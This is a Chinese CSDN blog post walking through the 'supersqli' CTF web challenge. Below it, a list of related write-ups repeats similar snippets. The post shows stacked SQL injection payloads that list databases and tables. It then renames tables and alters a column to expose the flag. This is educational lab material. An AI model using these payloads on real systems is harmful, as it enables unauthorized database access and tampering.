攻防世界web supersqli writeup

最新推荐文章于 2024-05-10 21:16:18 发布

Sprint#51264

最新推荐文章于 2024-05-10 21:16:18 发布

阅读量268

点赞数

分类专栏： Web

本文链接：https://blog.csdn.net/qq_45837896/article/details/107868306

版权

Web 专栏收录该内容

22 篇文章 0 订阅

订阅专栏

在这里插入图片描述
题目主界面如上，提交1查询出一条结果

在这里插入图片描述
尝试单引号注入发现报错，那么判断存在注入
用order by查询有几个字段；
当order by 3的时候发现出错了
接着使用union联合查询，发现关键字被过滤了，用大写也无法绕过
于是换用堆叠注入的方法

1';show databases #

在这里插入图片描述
出现多个数据库,注意到有supersqli库，再次构造

1';show tables from supersqli #

在这里插入图片描述
发现有两个表，分别对其进行查看得
1.words
2.1919810931114514(注意查询的时候以字符串为名的表要用反引号括住)
根据查询的结果来看，是一个数字外加一个字符串，与words表中数据相吻合，所以说words应该是默认查询的表，根据words中的id值进行查找，我们可以把1919810931114514这个表命名为words，并把其中的flag字段改为id，查询的时候就可以将flag进行显示，把原先的words改成其他名字，使有flag的表成为默认查询表

1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100);#

再进行or语句的构造

1' or 1=1#

在这里插入图片描述
参考链接：https://www.cnblogs.com/weak-chicken/p/12291092.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Sprint#51264

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

【攻防世界】Web 高手进阶区 supersqli （菜鸡蛋版本）

m0_52513952的博客

02-24

361

从进入高手进阶区开始，就越发觉得自己会的东西好少，php之前没学过，导致我压根看不懂之前那些需要读懂php源码才能拿到flag的题，于是我一跳再跳，终于看到了亲切而熟悉的“sql”，一道sql注入题，应该有机会能自己拿到flag了！！然而。。。

XCTF攻防世界 Web高手进阶区 supersqli writeup

Senimo

04-01

1054

XCTF攻防世界 Web高手进阶区 supersqli writeup supersqli 难度系数： 3.0 题目来源：强网杯 2019 题目描述：随便注启动靶机，打开环境：详细writeup参考： BUUCTF [强网杯 2019] 随便注 ...

参与评论您还未登录，请先登录后发表或查看评论

攻防世界-Web-supersqli

uh_eng的博客

08-14

346

【XCTF高手进阶区】web5_supersqli writeup（新）

Mitchell_Donovan的博客

02-04

1146

web5_supersqli 原题链接 key:SQL堆叠注入 ①题目打开后是这个样子的???? 再根据题目描述???? 大概率是道SQL注入题 ②像bkctf里的那道SQL注入题一样先把默认的inject=1提交一下提交inject=1'回显错误，猜测是单引号闭合提交inject=1'#回显正常，说明是单引号闭合 ③一样的操作，用order by判断联合注入的字段数提交inject=1' order by 2#，回显正常提交inject=1

攻防世界web进阶区之supersqli

qq_45756971的博客

07-16

440

打开题目所给链接：首先我们先探测其有无注入: 1’ 报错 1’# 正常且为True 1’ and 1=1# 正常且为True 1’ and 1=2# 正常且为False 所以它里边存在注入。用1’ or extractvalue(rand(),concat(0x7e,database())) #爆出数据库名：用0’; use supersqli; show tables;爆出表明：用0’; use supersqli; show columns from 1919810931114514; #

攻防世界 supersqli writeup

12-14

发现有注入，注入点为injiect=2’，接下来–dbs尝试查询数据库，只爆出supersqli，但无法爆出表。回到题目 order by 判断只有两个字段（别人的writerup说–+被过滤，只能使用#，不知道为什么没有,最后发现是在查询...

攻防世界 pwn babyheap writeup

liucc09的博客

01-19

568

分析这题题目中显示是Wellcome To the 2.27 Heap World，而且只能申请7个chunk，理论上应该是一道libc2.27 tcache的题，但因为在交互过程中触发了fastbin的double free错误，所以攻防世界上应该是把这题部署在了libc2.23的环境中，但无所谓，下面libc2.27和libc2.23的解法都会给出。 libc2.27解法首先我们要泄漏libc的地址，tcache肯定是无法泄漏libc的，因此我们考虑使用unsorted bin来泄漏，这题有off

【攻防世界】五 --- supersqli

qq_43168364的博客

12-23

452

题目 — supersqli 一、writeup 二、知识点

攻防世界 web高手进阶区 10分题 TimeKeeper

闵行小鱼塘

10-19

1467

继续ctf的旅程，开始攻防世界web高手进阶区的10分题，本文是TimeKeeper的writeup

攻防世界 web高手进阶区 10分题 Guess

闵行小鱼塘

11-03

1384

继续ctf的旅程，开始攻防世界web高手进阶区的10分题，本文是Guess的writeup

攻防世界-web supersqli

m0_48108919的博客

02-10

487

根据题目这是一道sql注入题输入1'测试，成功报错可以看到这是一个MariaDB数据库，MariaDB是MySQL的一个分支，与mysql大部分的用法都是一样的，只有一些参数，特性的不同 1.使用order by来测试字段 1' order by n # 当order by 2显示正常，当order by 3报错，可以确定有两个字段 2.使用联合查询 1' union select 1,2 # 提示对select等操作词语进行了正则过滤,尝试使用双写、/**/绕过无效 ...

攻防世界web进阶区supersqli

gongjingege的博客

07-25

1893

打开链接，初步判断应该是sql注入 顺便查看一下源代码，发现sqlmap没有灵魂，估计应该不让用，得手工注入先1’,报错再–+，发现被正则过滤，大小写也不行看了看大佬的wp，堆叠注入（呜，新名词。。。） inject=1’;show databases;# inject=1’;show tables;# 看一下这几个表 1’;show columns from words;# 1’;show columns from 1919810931114514;# (字符串为表名操作时要加反

【攻防世界】——WEB高手进阶--supersqli

weixin_43828818的博客

05-23

585

题目进去就是一个常见的注入，提交个1正常返回数据，提交’返回错误，存在注入。 order by 2–+时候正常返回，order by 3–+报错，发现有2个字段。接着正常程序走，准备联合查询字段，果然，不可能给的那么简单，果然报错，正则过滤了一些常用的查询关键字。尝试了多种普通绕过，大小写、重写都绕过不了，后来想到了堆叠注入；果然可以 1‘；show talbes–+ 查看两个表的字段名，在·1919810931114514·中发现我们想要的flag，查看words看一下结构。 1’;show c

攻防世界(CTF)~web-supersqli（详细解题思路）

最新发布

m0_75030189的博客

05-10

1141

mysql数据库sql语句的默认结束符是以;结尾，在执行多条SQL语句时就要使用结束符隔开，那么在;结束一条sql语句后继续构造下一条语句，会一起执行。这就是堆叠注入的基本原理

攻防世界web高手进阶区supersqli——Amao~

qq_45995328的博客

09-11

183

攻防世界web高手进阶区supersqli 1.判断是否存在注入： and 1=1 、and 1=2 都可以正常显示排除整型注入 ’ 加上报错，存在字符型注入 2. 判断字段数： 1’ order by 1、2正常显示 3 – # 报错，字段数为2 3.判断显位： 1' select 1,2 不能用联合查询，使用堆叠注入 4.查看数据库 1'; show databases -- # -- 必须加; 因为原始的sql语句格式为 select 。。。 from 。。。 where inj

攻防世界(web篇)---supersqli

飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘

06-09

827

一开始就是查询word表中的数据,所以我们可以利用数据库修改表名和列名的方法先把原来的words表名字改成别的,再将1919810931114514表的名字改为words再将改完名字后的表中的flag字段改为 id (id同样需要show columns from word得到)然后我们用1’ or 1=1 --+直接就能得到flag...

攻防世界web前五题和sql-labs前六题

kevinhezhuzhu的博客

11-05

150

攻防世界web前五题攻防世界做完忘截图了……还不能重新回去看……好尴尬 1.直接F12打开控制器查看flag。 2.输入robots.txt,再输入flag_1s_h3re.php即可查看flag。 3.输入index.php.bak，保存，打开，查看flag。 4.打开控制台，查看document，输入cookie.php，打开文件查看flag。 5.打开控制台，删除disabled=，点击按钮，查看flag。 sql-labs前六题 1.less1 输入 ?id=1 and 1.

实验吧-简单的sql注入3 Writeup

baynk的博客

07-29

381

继续继续过程输入1，然后发现只有一个hello。。。好吧，肯定得盲注了，先试试闭合吧，果然还是单引号的，但是居然有报错信息，应该也可以使用报错注入吧。然后再尝试干掉单引号的时候意外发现#居然可以用了，这真是省了不少事。。想来想去还是使用报错注入，盲注还是交给sqlmap来解决吧。先来搞库名，用的floor()，结果来这么一出。 don't到底是个啥，又换了两种其他的报错，updatexm...

攻防世界shuffle

09-03

- *3* [攻防世界Reverse进阶区-Shuffle-writeup](https://blog.csdn.net/qq_35056292/article/details/108676766)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...